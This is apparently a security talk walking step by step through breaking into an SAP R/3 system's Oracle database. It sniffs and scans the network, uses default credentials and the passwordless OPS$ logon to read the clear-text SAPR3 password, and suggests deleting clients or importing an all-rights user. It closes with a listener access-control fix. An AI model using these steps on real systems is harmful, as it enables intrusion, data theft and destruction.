{\rtf1\ansi\deff0 {\fonttbl{\f2\fnil\fcharset0 Courier New;} {\f1\fnil\fcharset0 Arial;} {\f0\fnil\fcharset0 Times New Roman;} } {\colortbl;}{\stylesheet{\s1 Heading 1;}{\s2 Heading 2;}{\s3 Heading 3;}{\s4 Heading 4;}{\s5 Heading 5;}{\s6 Heading 6;}{\s7 Heading 7;}{\s8 Heading 8;}{\s9 Heading 9;}} \deflang1024\notabind\facingp\hyphauto1\widowctrl \sectd\plain\pgwsxn11905\pghsxn16837\marglsxn1440\margrsxn1440\margtsxn1440\margbsxn1920\headery0\footery0\pgndec\titlepg{\headerf\pard\sl-240\sb770\sa430\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {}\par}{\footerf\pard\sl-240\sb770\sa910\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {\i \chpgn }\par}{\headerl\pard\sl-240\sb770\sa430\plain\tqc\tx4512\tqr\tx9025 {\i Hacking a SAP Database}\tab {}\tab {}\par}{\footerl\pard\sl-240\sb770\sa910\plain\tqc\tx4512\tqr\tx9025 {\i \chpgn }\tab {}\tab {}\par}{\headerr\pard\sl-240\sb770\sa430\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {\i Hacking a SAP Database}\par}{\footerr\pard\sl-240\sb770\sa910\plain\tqc\tx4512\tqr\tx9025 {}\tab {}\tab {\i \chpgn }\par}\pard\sb448\li960\sl776\qc \b\fs59\f1 Hacking a SAP Database\keepn\hyphpar0\par\pard\sb259\li960\sl539\qc \fs41 Jochen Hein\keepn\hyphpar0\par\pard\sb311\s1\sl539 1. How to hack an SAP system\keepn\hyphpar0\par\pard\sb240\brdrt\brdrs\brdrw40\brsp120\li1720\ri240\brdrl\brdrs\brdrw40\brsp240\li1720\ri240\brdrb\brdrs\brdrw40\brsp0\li1720\ri240\brdrr\brdrs\brdrw40\brsp240\li1720\ri240\sl449\qc \fs34 Warning\keepn\hyphpar0\par\pard\sb120\brdrt\brdrs\brdrw40\brsp120\li1720\ri240\brdrl\brdrs\brdrw40\brsp240\li1720\ri240\brdrb\brdrs\brdrw40\brsp0\li1720\ri240\brdrr\brdrs\brdrw40\brsp240\li1720\ri240\sl286\qj \b0\fs22\lang1033 Kids, don't do that at home. 
We are only using tools and techniques that have been known for a long time...\keepn\par\pard\brdrt\brdrs\brdrw40\brsp120\li1720\ri240\brdrl\brdrs\brdrw40\brsp240\li1720\ri240\brdrb\brdrs\brdrw40\brsp0\li1720\ri240\brdrr\brdrs\brdrw40\brsp240\li1720\ri240\sl-120\keepn\par\pard\sl-1\par\pard\sb259\s2\sl449 \b\fs34\lang1024 1.1. Getting access with network means\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 We are starting with no knowledge about the system or the network (besides guessing that there is an R/3 system). Since most SAP customers use an Oracle database, the chances of meeting such a system are high. Our tool of choice is a laptop with some network tools, an Oracle client, and the SAP kernel. We need network access, for example an unused port, a mini-hub, or a port connected to a printer. And now we start sniffing the network traffic.\par\pard\sb120\li960\sl312\qj SAP R/3 systems communicate on possibly many ports. The application server (the dispatcher) listens on a port from 3200 to 3299, the message server on a port in the range 3600 to 3699. The last two digits are called the system number. You can change the port numbers, but chances are very high that the customer uses ports in these ranges. Have a look at the command line for \b tcpdump\b0 ({\field{\*\fldinst HYPERLINK \\l ID_fig_45_sniffer}{\fldrslt Figure 1}}). 
There are other tools as well that you can use.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sniffer}{\*\bkmkend ID_fig_45_sniffer}\fs19\lang1024\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 #!/bin/sh\sa0\par\fi0\sb0 \fs19 \~\fs21 # SYN or FIN set, destination port in the dispatcher or message server range\sa0\par\fi0\sb0 \fs19 \~\fs21 tcpdump -n -i eth0 'tcp[13] & 3 != 0 and \\\sa0\par\fi0\sb0 \fs19 \~\fs21 ((tcp[2:2] >= 3200 and tcp[2:2] < 3300) or \\\sa0\par\fi0\sb0 \fs19 \~\fs21 (tcp[2:2] >= 3600 and tcp[2:2] < 3700))'\sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 1. Packet sniffer\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \lang1033 tcpdump\b0 will show all connects to the application servers. The expression \fs21\f2 tcp[13] & 3 != 0\fs24\f0 selects packets with the SYN or FIN flag set, that is connection set-up and tear-down, and \fs21\f2 tcp[2:2]\fs24\f0 is the destination port, so only the server side of each connection is listed. The option \fs21\f2 -n\fs24\f0 displays only IP addresses, no names. We note the output ({\field{\*\fldinst HYPERLINK \\l ID_fig_45_sniffer_45_2}{\fldrslt Figure 2}}; the output has been shortened).\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sniffer_45_2}{\*\bkmkend ID_fig_45_sniffer_45_2}\fs19\lang1024\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 \sa0\par\fi0\sb0 192.168.1.1.4722 > 192.168.10.1.3200\sa0\par\fi0\sb0 \fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 2. Sniffer output\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\lang1033 We know one or more SAP application servers and can now start looking at them in more detail. 
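\par\pard\sb120\li960\sl312\qj As an added example that is not part of the original talk, the following shell script reduces sniffer output like that of Figure 2 to the list of SAP instances it reveals: it keeps only the destination side of every connection, classifies the port as dispatcher (32\i nn\i0 ), gateway (33\i nn\i0 ) or message server (36\i nn\i0 ) and derives the system number from its last two digits. The sample input is constructed here in the line format of Figure 2; the addresses are made up.\par\pard\sb120\li960\sl281\qj \fs21\f2 
```shell
#!/bin/sh
# Added example, not from the talk: reduce the output of the sniffer in
# Figure 1 to the SAP instances it reveals. tcpdump -n prints
# "src-ip.src-port > dst-ip.dst-port" for every packet; only the destination
# identifies the server, and the last two digits of a 32nn, 33nn or 36nn port
# are the system number that dispatcher, gateway and message server share.
sap_targets() {
    awk '
    {
        for (i = 1; i < NF; i++) {
            if ($i != ">") continue
            dst = $(i + 1)
            sub(":$", "", dst)                 # drop the trailing colon tcpdump adds
            n = split(dst, a, "[.]")
            if (n != 5) next                   # not of the form ip.port
            host = a[1] "." a[2] "." a[3] "." a[4]
            port = a[5] + 0
            role = ""
            if (port >= 3200 && port <= 3299) role = "dispatcher"
            else if (port >= 3300 && port <= 3399) role = "gateway"
            else if (port >= 3600 && port <= 3699) role = "message-server"
            if (role == "") next               # reply direction or other service
            print host, port, role, sprintf("%02d", port % 100)
        }
    }' | LC_ALL=C sort -u
}

# Constructed sample in the old tcpdump line format used in Figure 2. Line 3
# is the server's FIN going back to the client, line 6 a connect to the Oracle
# listener that the filter of Figure 1 would not even capture; both are ignored.
SAMPLE='12:00:01.10 192.168.1.1.4722 > 192.168.10.1.3200: S 1:1(0) win 8760
12:00:01.20 192.168.1.2.4911 > 192.168.10.1.3600: S 2:2(0) win 8760
12:00:02.30 192.168.10.1.3200 > 192.168.1.1.4722: F 3:3(0) ack 1 win 8760
12:00:03.40 192.168.1.3.1044 > 192.168.10.7.3201: S 4:4(0) win 8760
12:00:03.50 192.168.1.3.1045 > 192.168.10.1.3200: S 5:5(0) win 8760
12:00:04.60 192.168.1.4.1050 > 192.168.10.9.1527: S 6:6(0) win 8760'

# Live use would be: tcpdump -n -i eth0 ... | sap_targets
printf '%s' "$SAMPLE" | sap_targets
```
\fs24\f0 \par\pard\sb120\li960\sl312\qj Fed from a live capture the script produces the same table without any guessing about which of the many connections on a busy network belong to SAP; the same address with a different system number means a second instance on that host.\par\pard\sb120\li960\sl312\qj 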
The first defense against the sniffing attack is using a switch (most people do that by now). Nevertheless there are attacks against switches that degrade them to hubs, for example flooding the MAC address table. After that, the sniffing attack is possible again.\par\pard\sb120\li960\sl312\qj We now choose an unused IP address for our laptop (or use DHCP). From now on we risk being detected, since we are an active node on the network. It might be helpful to sniff DNS packets to learn the IP address of the DNS server.\par\pard\sb120\li960\sl312\qj We use \b SAPGUI\b0 to connect to the SAP system ({\field{\*\fldinst HYPERLINK \\l ID_lis_45_sapgui_45_connect}{\fldrslt Figure 3}}). The last line in the window is the status line, which tells us the System-ID. The System-ID is the same as the Oracle System-ID (if Oracle is used). If we have seen a connection to port 36\i\f2 nr\i0\f0 we can use \b lgtst\b0 , which asks the message server for its list of application servers and logon groups, to get more information about the system.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_lis_45_sapgui_45_connect}{\*\bkmkend ID_lis_45_sapgui_45_connect}\fs19\lang1024\f2 \~\fs21 SAPGUI\sa0\par\fi0\sb0 \fs19 \~\fs21 /H/\i victim-IP\i0 /S/\i victim-Port\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 3. Using SAPGUI\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb259\s2\sl449 \fs34\f1 1.2. Preparing the attack\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 We are now looking for the database server of the SAP system. 
A portscan of the SAP application server might reveal a message server and an Oracle listener port ({\field{\*\fldinst HYPERLINK \\l ID_fig_45_nmap}{\fldrslt Figure 4}}).\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_nmap}{\*\bkmkend ID_fig_45_nmap}\fs19\lang1024\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 nmap -p 3200-3699 \i victim-IP\i0  {\*\bkmkstart ID_co_45_nmap_45_sap}{\*\bkmkend ID_co_45_nmap_45_sap}\b (1)\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 nmap -p 1527 \i victim-IP\i0  {\*\bkmkstart ID_co_45_nmap_45_oracle}{\*\bkmkend ID_co_45_nmap_45_oracle}\b (2)\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 4. Using a port scanner\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li1320\sl312\fi-360\qj \tx1320 (1)\tab \b0 These are the ports of the SAP dispatcher (32\i\f2 xx\i0\f0 ), possibly gateway processes (33\i\f2 xx\i0\f0 ) and the message server (36\i\f2 xx\i0\f0 ).\hyphpar0\par\pard\sb120\li1320\sl312\fi-360\qj \tx1320 \b (2)\tab \b0 Looking for the Oracle listener: 1527 is the default listener port of SAP installations (a plain Oracle installation uses 1521). Sometimes other ports are used as well...\hyphpar0\par\pard\sb120\li960\sl312\qj \lang1033 A wild guess: We are facing a SAP system with database and central instance on one machine. We can verify that with \b sapinfo\b0 ({\field{\*\fldinst HYPERLINK \\l ID_fig_45_sapinfo}{\fldrslt Figure 5}}). 
\b sapinfo\b0 is part of the RFC-SDK on the GUI CD.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sapinfo}{\*\bkmkend ID_fig_45_sapinfo}\fs19\lang1024\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 cracker# \fs21 \b sapinfo awhost=\i ip-address\i0 sysnr=\i nr\b0\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 SAP System Information\sa0\par\fi0\sb0 \fs19 \~\fs21 -----------------------------------------------\sa0\par\fi0\sb0 \fs19 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 Destination \i hostname\i0 _\i SID\i0 _\i nr\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 Host \i hostname\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 System ID \i SID\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 Database \i SID\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 DB host \i hostname\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 DB system ORACLE \sa0\par\fi0\sb0 \fs19 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 SAP release 40B \sa0\par\fi0\sb0 \fs19 \~\fs21 SAP kernel release 40B \sa0\par\fi0\sb0 \fs19 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 RFC Protokoll 011\sa0\par\fi0\sb0 \fs19 \~\fs21 Characters 1100\sa0\par\fi0\sb0 \fs19 \~\fs21 Integers BIG\sa0\par\fi0\sb0 \fs19 \~\fs21 Floating P. IE3\sa0\par\fi0\sb0 \fs19 \~\fs21 SAP machine id 320\sa0\par\fi0\sb0 \fs19 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 Timezone 3600 (Daylight saving time)\sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 5. Using sapinfo\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\lang1033 The \fs21\f2 DB host\fs24\f0 line names the database server; if the SAP host has only one NIC we are done. 
Otherwise it might help to use \b lgtst\b0 or queries to the DNS server to guess the right IP address.\par\pard\sb120\li960\sl312\qj Starting from nothing we gained the following knowledge:\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19\lang1024 \'95\tab \fs24 The IP address(es) of the victim\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 The SAP system number (the last two digits of the SAP port)\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 The System-ID of the SAP system and of the Oracle database\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 The name of the database server\hyphpar0\par\pard\sb120\li960\sl312\qj \lang1033 This is all we need to know about the database, so we now launch our attack.\par\pard\sb259\s2\sl449 \b\fs34\lang1024\f1 1.3. Getting access to the Oracle database\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 We craft a SQL*Net V2 configuration which will give us access to the database. We need the file \fs21\f2 sqlnet.ora\fs24\f0 (the default SAP file, see {\field{\*\fldinst HYPERLINK \\l ID_fig_45_sqlnet}{\fldrslt Figure 6}}) and a file called \fs21\f2 tnsnames.ora\fs24\f0 ({\field{\*\fldinst HYPERLINK \\l ID_fig_45_tnsnames}{\fldrslt Figure 7}}). 
The environment variable TNS_ADMIN points to the directory that holds these files; on our laptop we are free to put them wherever we like.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_sqlnet}{\*\bkmkend ID_fig_45_sqlnet}\fs19\lang1024\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 ################\sa0\par\fi0\sb0 \fs19 \~\fs21 # Filename......: template sqlnet.ora\sa0\par\fi0\sb0 \fs19 \~\fs21 # Name..........: \sa0\par\fi0\sb0 \fs19 \~\fs21 # Date..........: \sa0\par\fi0\sb0 \fs19 \~\fs21 ################\sa0\par\fi0\sb0 \fs19 \~\fs21 AUTOMATIC_IPC = ON\sa0\par\fi0\sb0 \fs19 \~\fs21 TRACE_LEVEL_CLIENT = OFF\sa0\par\fi0\sb0 \fs19 \~\fs21 SQLNET.EXPIRE_TIME = 0\sa0\par\fi0\sb0 \fs19 \~\fs21 NAMES.DEFAULT_DOMAIN = world\sa0\par\fi0\sb0 \fs19 \~\fs21 NAME.DEFAULT_ZONE = world\sa0\par\fi0\sb0 \fs19 \~\fs21 #SQLNET.AUTHENTICATION_SERVICES = (ALL)\sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 6. 
The file \fs21\f2 sqlnet.ora\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_tnsnames}{\*\bkmkend ID_fig_45_tnsnames}\b0\fs19 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i SID\i0 .world =\sa0\par\fi0\sb0 \fs19 \~\fs21 (DESCRIPTION =\sa0\par\fi0\sb0 \fs19 \~\fs21 (ADDRESS_LIST =\sa0\par\fi0\sb0 \fs19 \~\fs21 (ADDRESS =\sa0\par\fi0\sb0 \fs19 \~\fs21 (COMMUNITY = sap.world)\sa0\par\fi0\sb0 \fs19 \~\fs21 (PROTOCOL = TCP)\sa0\par\fi0\sb0 \fs19 \~\fs21 (Host = \i hostname\i0 )\sa0\par\fi0\sb0 \fs19 \~\fs21 (Port = 1527)\sa0\par\fi0\sb0 \fs19 \~\fs21 )\sa0\par\fi0\sb0 \fs19 \~\fs21 )\sa0\par\fi0\sb0 \fs19 \~\fs21 (CONNECT_DATA =\sa0\par\fi0\sb0 \fs19 \~\fs21 (SID = \i SID\i0 )\sa0\par\fi0\sb0 \fs19 \~\fs21 (GLOBAL_NAME = \i SID\i0 .world)\sa0\par\fi0\sb0 \fs19 \~\fs21 )\sa0\par\fi0\sb0 \fs19 \~\fs21 )\sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 7. The file \fs21\f2 tnsnames.ora\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\fs24\lang1033\f0 Host name, port and SID are the ones found in the previous section. If the default passwords have not been changed we can use the SQL command \b connect sapr3/sap@\i\f2 SID\b0\i0\f0 in \b svrmgrl\b0 to connect to the database \'96 thank you for playing. Otherwise we have to use the OPS$ access to get the SAPR3 password ({\field{\*\fldinst HYPERLINK \\l ID_fig_45_opsuser}{\fldrslt Figure 8}}). 
So we create a local user \i\fs21\f2 sid\i0 adm\fs24\f0 on our laptop and start playing: the database maps the operating-system user name reported by the client to its account OPS$\i\fs21\f2 SID\i0 ADM\fs24\f0 without asking for a password, as long as the instance trusts remote operating-system logins (\fs21\f2 remote_os_authent\fs24\f0 ), which SAP installations enable because their application servers on other hosts log on the same way.\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_fig_45_opsuser}{\*\bkmkend ID_fig_45_opsuser}\fs19\lang1024\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b setenv TNS_ADMIN $HOME/\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b setenv ORACLE_HOME /oracle/\i SID\b0\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b setenv ORACLE_SID \i SID\b0\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b svrmgrl\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 \sa0\par\fi0\sb0 Oracle Server Manager Release 3.0.6.0.0 - Production\sa0\par\fi0\sb0 \sa0\par\fi0\sb0 (c) Copyright 1999, Oracle Corporation. All Rights Reserved.\sa0\par\fi0\sb0 \sa0\par\fi0\sb0 Oracle8 Enterprise Edition Release 8.0.6.1.0 - Production\sa0\par\fi0\sb0 PL/SQL Release 8.0.6.1.0 - Production\sa0\par\fi0\sb0 \sa0\par\fi0\sb0 SVRMGR>\fs21 \b connect /@\i SID\b0\i0 {\*\bkmkstart ID_co_45_ops}{\*\bkmkend ID_co_45_ops}\b (1)\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 Connected.\sa0\par\fi0\sb0 SVRMGR>\fs21 \b select * from sapuser;\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 USERID PASSWD\sa0\par\fi0\sb0 ------ ------\sa0\par\fi0\sb0 SAPR3 geheim\sa0\par\fi0\sb0 1 row selected.\sa0\par\fi0\sb0 SVRMGR>\fs21 \b connect SAPR3/geheim@\i SID\b0\i0 {\*\bkmkstart ID_co_45_sap}{\*\bkmkend ID_co_45_sap}\b (2)\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 Connected.\sa0\par\fi0\sb0 SVRMGR>\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 8. 
Hacking Oracle\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li1320\sl312\fi-360\qj \tx1320 (1)\tab \b0 We connect as the OPS$ user; no password is needed, the server trusts the operating-system user name our laptop reports.\hyphpar0\par\pard\sb120\li1320\sl312\fi-360\qj \tx1320 \b (2)\tab \b0 Table \fs21\f2 SAPUSER\fs24\f0 contains the password in clear text and we are set.\hyphpar0\par\pard\sb259\s2\sl449 \b\fs34\f1 1.4. Ideas\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 Current SAP R/3 releases store the SAPR3 password encrypted in the table SAPUSER. We have two ways out:\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19\lang1024 \'95\tab \fs24 Attack the encryption.\hyphpar0\par\pard\sb120\li1200\sl312\fi-240\qj \tx1200 \fs19 \'95\tab \fs24 Use SAP tools to access the database, for example \b R3trans\b0 : it connects through the same OPS$ mechanism, reads and decrypts the SAPR3 password itself and then executes the commands of its control file, so the encryption protects nothing (Figure 9).\sa240\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx7825\dppty0\dpx1200\dpy0\dpxsize7825\dpysize0\dplinew40}\keepn\par\pard\sb120\li1200\sl281\qj \fs19\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b export PATH="$PATH:/oracle/\i SID\i0 /817_32/bin:/usr/sap/\i SID\i0 /SYS/exe/run"\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b export dbms_type=ora\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b export DIR_LIBRARY=/usr/sap/\i SID\i0 /SYS/exe/run\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b export dbs_ora_tnsname=\i SID\b0\i0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b export TNS_ADMIN=/home/sidadm\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b cat control\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 export\sa0\par\fi0\sb0 compress=no\sa0\par\fi0\sb0 client=000\sa0\par\fi0\sb0 # select table where name = T000\sa0\par\fi0\sb0 select * from t000\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b R3trans control\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 ...\sa0\par\fi0\sb0 \fs19 \~\fs21 \i\fs19 sid\i0 adm>\fs21 \b strings 
trans.dat\b0 \sa0\par\fi0\sb0 \fs19 \~\fs21 \fs19 ...\sa0\par\fi0\sb0 q 000SAP AG Walldorf DEM [...]\sa0\par\fi0\sb0 q 001Auslieferungsmandant R11 Kundstadt EUR [...]\sa0\par\fi0\sb0 ...\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li1200\sl312\qj \b\fs24\f0 Figure 9. R3trans for Oracle access\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx7825\dppty0\dpx1200\dpy0\dpxsize7825\dpysize0\dplinew40}\par\pard\sb240\li1200\sl312\qj \b0\lang1033 The export file \fs21\f2 trans.dat\fs24\f0 is in R3trans format, but \b strings\b0 is enough to read the client table. An attacker might do:\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17\lang1024 \'95\tab \fs24 clientremove ;-) (R3trans deletes a whole client with it)\hyphpar0\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17 \'95\tab \fs24 export tables and analyze them offline\hyphpar0\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17 \'95\tab \fs24 import a user with SAP_ALL rights\hyphpar0\par\pard\sb120\li1440\sl312\fi-240\qj \tx1440 \fs17 \'95\tab \fs24 import other data\hyphpar0\par\pard\sb259\s2\sl449 \b\fs34\f1 1.5. Wrapup\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 Hacking is fun. Changing the default passwords is only a first step, since the OPS$ logon still works for anyone who can reach the listener. The only real means against the attack is denying access to the database port to everything but the application servers, either with a packet filter or with a \fs21\f2 protocol.ora\fs24\f0 configuration ({\field{\*\fldinst HYPERLINK \\l ID_lis_45_protocol_46_ora}{\fldrslt Figure 10}}).\sa240\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\keepn\par\pard\sb120\li960\sl281\qj {\*\bkmkstart ID_lis_45_protocol_46_ora}{\*\bkmkend ID_lis_45_protocol_46_ora}\fs19\lang1024\f2 \~\fs21 \sa0\par\fi0\sb0 \fs19 \~\fs21 tcp.nodelay = true\sa0\par\fi0\sb0 \fs19 \~\fs21 tcp.validnode_checking = yes\sa0\par\fi0\sb0 \fs19 \~\fs21 tcp.invited_nodes = ( \fs19 ip address\fs21 , \fs19 ip address\fs21 )\sa0\par\fi0\sb0 \fs19 \~\fs21 \keepn\hyphpar0\par\pard\sb120\li960\sl312\qj \b\fs24\f0 Figure 10. 
The file \fs21\f2 protocol.ora\sa120\keepn\hyphpar0\par\pard\sl-1{\*\do\dobxcolumn\dobypara\dodhgt0\dpline\dpptx0\dppty0\dpptx8065\dppty0\dpx960\dpy0\dpxsize8065\dpysize0\dplinew40}\par\pard\sb240\li960\sl312\qj \b0\fs24\lang1033\f0 The only drawback is that every new application server must be added to the list as well, and possibly other systems of the transport landscape (for test imports). With Oracle 9i and later the same two parameters are set in \fs21\f2 sqlnet.ora\fs24\f0 on the listener host instead of \fs21\f2 protocol.ora\fs24\f0 .\par\pard\sb259\s2\sl449 \b\fs34\lang1024\f1 1.6. OSS-Notes\keepn\hyphpar0\par\pard\sb173\li960\sl312\qj \b0\fs24\lang1033\f0 SAP Notes 186119, 361641 and 50088.\par}
